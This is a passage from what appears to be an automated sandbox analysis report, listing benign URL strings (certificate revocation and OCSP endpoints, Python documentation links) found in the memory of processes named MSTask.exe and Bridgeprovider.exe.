00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                  Source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                  Source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micB
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925792761.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925612181.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927960487.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                  Source: MSTask.exe, 0000003E.00000002.4151888834.00000268D2090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                                  Source: MSTask.exe, 0000003E.00000002.4150128342.00000268D19E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://goo.gl/zeJZl.
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                  Source: MSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://greenbytes.de/tech/tc2231/
                                  Source: MSTask.exe, 0000003E.00000002.4150608257.00000268D1C7D000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/
                                  Source: MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                                  Source: MSTask.exe, 0000003E.00000002.4150128342.00000268D19E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html.
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925792761.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1925612181.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927960487.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.dr String found in binary or memory: http://ocsp.thawte.com0
                                  Source: MSTask.exe, 0000003E.00000002.4150608257.00000268D1D2A000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pypi.python.org/pypi/wget/
                                  Source: Bridgeprovider.exe, 00000041.00000002.2009860535.0000000003C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: MSTask.exe, 0000003E.00000002.4151510423.00000268D1EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915259624.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, _ssl.pyd.56.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1CC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/
                                  Source: MSTask.exe, 00000038.00000003.1916592166.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4151133313.00000268D1D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
                                  Source: MSTask.exe, 0000003E.00000002.4149377598.00000268D17E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                                  Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yahoo.com/
                                  Source: MSTask.exe, 0000003E.00000002.4151443278.00000268D1E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cloud.google.com/appengine/docs/standard/runtimes
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
